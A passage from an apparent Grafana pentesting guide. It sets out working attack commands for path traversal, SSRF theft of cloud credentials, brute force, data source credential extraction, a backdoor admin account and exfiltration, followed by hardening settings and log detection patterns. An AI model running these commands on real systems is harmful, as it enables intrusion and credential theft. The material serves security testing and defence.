curl -H "Authorization: Bearer API_KEY" http://target:3000/api/datasources
# List all API keys (admin only)
curl -u admin:password http://target:3000/api/auth/keys5. Insecure Data Source Configurations
Impact: Credential theft, lateral movement
Target: Data source configurations with embedded credentials
# Extract data source credentials
curl -u admin:password http://target:3000/api/datasources | jq -r '.[] | select(.password or .secureJsonData)'
# Common data sources with credentials:
# - MySQL/PostgreSQL: username, password, host
# - Elasticsearch: API key, username, password
# - Prometheus: bearer token
# - InfluxDB: username, password, token🛠️ Complete Pentesting Methodology
This section provides a comprehensive, step-by-step methodology for pentesting Grafana instances, from initial reconnaissance to post-exploitation.
Phase 1: Reconnaissance
# Discover Grafana instances
shodan search "grafana"
censys search "services.http.response.body:grafana"
# Nmap service detection
nmap -p 3000 -sV --script http-title target
# Banner grabbing
curl -I http://target:3000
curl -s http://target:3000/api/health | jq .
# Version detection
curl -s http://target:3000/login | grep -oP 'v\d+\.\d+\.\d+'Phase 2: Enumeration
# Check for anonymous access
curl http://target:3000/api/org
curl http://target:3000/api/dashboards/home
# User enumeration (CVE-2022-39229)
curl -X POST http://target:3000/api/user/password/sent-reset-email \
-H "Content-Type: application/json" \
-d '{"loginOrEmail":"admin@target.com"}'
# Dashboard enumeration (requires auth)
curl -u user:pass http://target:3000/api/search
# Plugin enumeration
curl http://target:3000/api/plugins
# Organization enumeration
curl -u user:pass http://target:3000/api/orgsPhase 3: Vulnerability Assessment
# Automated scanning with Nuclei
nuclei -u http://target:3000 -t cves/ -severity critical,high
# Test for CVE-2021-43798 (Path Traversal)
curl http://target:3000/public/plugins/alertlist/../../../../../../../../etc/passwd
# Test for CVE-2024-9264 (SQL Injection)
# Requires authentication - see detailed exploitation section above
# Test for XSS vulnerabilities
# Try various XSS payloads in dashboard names, panel titles, etc.
# Test for SSRF (CVE-2020-13379)
curl "http://target:3000/avatar/test?d=169.254.169.254%25253f%253b%252fbp.blogspot.com%252flatest/meta-data/"Phase 4: Exploitation
# Default credential attack
for user in admin grafana; do
for pass in admin password grafana prom-operator; do
echo "Trying $user:$pass"
curl -X POST http://target:3000/login \
-H "Content-Type: application/json" \
-d "{\"user\":\"$user\",\"password\":\"$pass\"}"
done
done
# Brute force attack
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt \
target http-post-form "/login:user=^USER^&password=^PASS^:F=Invalid"
# Exploit known CVEs
# Use tools from GitHub (see CVE sections above)Phase 5: Post-Exploitation
# Extract data source credentials
curl -u admin:password http://target:3000/api/datasources | jq .
# Create backdoor admin account
curl -X POST http://target:3000/api/admin/users \
-u admin:password \
-H "Content-Type: application/json" \
-d '{"email":"backdoor@evil.com","login":"backdoor","password":"SecurePass123!","role":"Admin"}'
# Create persistent API key
curl -X POST http://target:3000/api/auth/keys \
-u admin:password \
-H "Content-Type: application/json" \
-d '{"name":"maintenance","role":"Admin","secondsToLive":31536000}'
# Exfiltrate dashboards
curl -u admin:password http://target:3000/api/search | \
jq -r '.[].uid' | \
while read uid; do
curl -u admin:password "http://target:3000/api/dashboards/uid/$uid" > "dashboard_$uid.json"
done
# Access backend databases
# Use extracted data source credentials to connect to backend systemsPhase 6: Lateral Movement
# Use Grafana as pivot point
# 1. Extract database credentials from data sources
# 2. Use SSRF to scan internal network
# 3. Access cloud metadata for IAM credentials
# 4. Leverage monitoring data to map infrastructure
# Example: AWS credential theft via SSRF
curl "http://target:3000/avatar/test?d=169.254.169.254%25253f%253b%252fbp.blogspot.com%252flatest/meta-data/iam/security-credentials/"
# Use stolen credentials
aws configure set aws_access_key_id STOLEN_KEY
aws configure set aws_secret_access_key STOLEN_SECRET
aws s3 ls🛡️ Defense and Hardening
Securing Grafana requires a multi-layered approach combining configuration hardening, network security, and continuous monitoring.
Essential Security Configurations
# /etc/grafana/grafana.ini
[server]
# Bind to localhost only if behind reverse proxy
http_addr = 127.0.0.1
# Use HTTPS
protocol = https
cert_file = /etc/grafana/ssl/cert.pem
cert_key = /etc/grafana/ssl/key.pem
[security]
# Change default admin password immediately
admin_user = admin
admin_password = CHANGE_ME_IMMEDIATELY
# Use strong secret key
secret_key = GENERATE_RANDOM_256_BIT_KEY
# Disable embedding in iframes
allow_embedding = false
# Enable strict transport security
strict_transport_security = true
# Set secure cookie flags
cookie_secure = true
cookie_samesite = strict
[auth]
# Disable basic auth if using OAuth/SAML
disable_login_form = true
# Disable user signup
disable_signout_menu = false
[auth.anonymous]
# Disable anonymous access
enabled = false
[users]
# Disable user signup
allow_sign_up = false
# Disable org creation
allow_org_create = false
[dashboards]
# Limit dashboard versions
versions_to_keep = 20
[log]
# Enable detailed logging
mode = console file
level = info
[alerting]
# Secure alerting
enabled = true
execute_alerts = trueNetwork Security
# Firewall rules (iptables)
# Allow only from specific IPs
iptables -A INPUT -p tcp --dport 3000 -s TRUSTED_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 3000 -j DROP
# Or use nginx reverse proxy with authentication
server {
listen 443 ssl;
server_name grafana.example.com;
ssl_certificate /etc/ssl/certs/grafana.crt;
ssl_certificate_key /etc/ssl/private/grafana.key;
# Rate limiting
limit_req_zone $binary_remote_addr zone=grafana:10m rate=10r/s;
limit_req zone=grafana burst=20;
# WAF rules
# Block path traversal attempts
location ~ \.\./\.\./\.\. {
deny all;
}
location / {
proxy_pass http://127.0.0.1:3000;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
}
}Monitoring and Detection
# Monitor Grafana logs for suspicious activity
tail -f /var/log/grafana/grafana.log | grep -E "(failed|error|unauthorized)"
# Alert on suspicious patterns
# - Multiple failed login attempts
# - Access to /public/plugins/ with ../
# - Unusual API key creation
# - Data source modifications
# - User privilege changes
# Example: Detect CVE-2021-43798 exploitation
grep -E "public/plugins/.*\.\./\.\./\.\." /var/log/nginx/access.log
# Example: Detect CVE-2024-9264 exploitation
grep -E "ds_type=__expr__.*type.*sql" /var/log/grafana/grafana.logIncident Response Checklist
If you suspect a Grafana compromise:
- Isolate the instance: Block network access immediately
- Preserve evidence: Take snapshots, copy logs before they rotate
- Revoke credentials: Reset all user passwords, delete API keys
- Audit data sources: Check if backend system credentials were accessed
- Review dashboards: Look for malicious modifications or data exfiltration
- Check for backdoors: Review user accounts, API keys, and webhooks
- Patch and rebuild: Update to latest version, consider clean rebuild
- Post-mortem: Document the incident, improve detection and prevention
📚 Additional Resources and References
- Official Grafana Security Advisories: https://grafana.com/security/security-advisories/
- CISA Known Exploited Vulnerabilities: https://www.cisa.gov/known-exploited-vulnerabilities-catalog
- CVE-2024-9264 POC: https://github.com/nollium/CVE-2024-9264
- CVE-2021-43798 POC: https://github.com/K3ysTr0K3R/CVE-2021-43798-EXPLOIT
- Grafana CVE Collection: https://github.com/kh4sh3i/Grafana-CVE
- Hackviser Grafana Pentesting Guide: https://hackviser.com/tactics/pentesting/services/grafana
- Grafana Security Documentation: https://grafana.com/docs/grafana/latest/setup-grafana/configure-security/
- NVD - National Vulnerability Database: https://nvd.nist.gov/
🎯 Conclusion
Grafana's widespread adoption in modern infrastructure makes it a high-value target for attackers. As demonstrated throughout this guide, the attack surface is extensive, ranging from critical remote code execution vulnerabilities to subtle authentication bypasses and numerous XSS vectors. The comprehensive CVE table and detailed exploitation guides provided here represent the most complete public resource for Grafana security testing as of 2025.
Key takeaways for security professionals:
- Stay updated: New vulnerabilities are discovered regularly. Subscribe to Grafana security advisories and monitor CISA KEV catalog.
- Defense in depth: No single security control is sufficient. Combine patching, configuration hardening, network segmentation, and monitoring.
- Assume breach: Implement detection and response capabilities. Monitor for exploitation attempts and have an incident response plan.
- Least privilege: Grant users only the minimum permissions required. Regularly audit user accounts and API keys.
- Secure by default: Change default credentials immediately, disable unnecessary features, and follow security best practices from day one.
For penetration testers and red teamers, this guide provides a comprehensive methodology and toolkit for assessing Grafana security. Always ensure you have proper authorization before testing, and follow responsible disclosure practices when discovering new vulnerabilities.
Disclaimer: This guide is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. Always obtain proper authorization before conducting security assessments. The author and publisher assume no liability for misuse of this information.
Comments
Post a Comment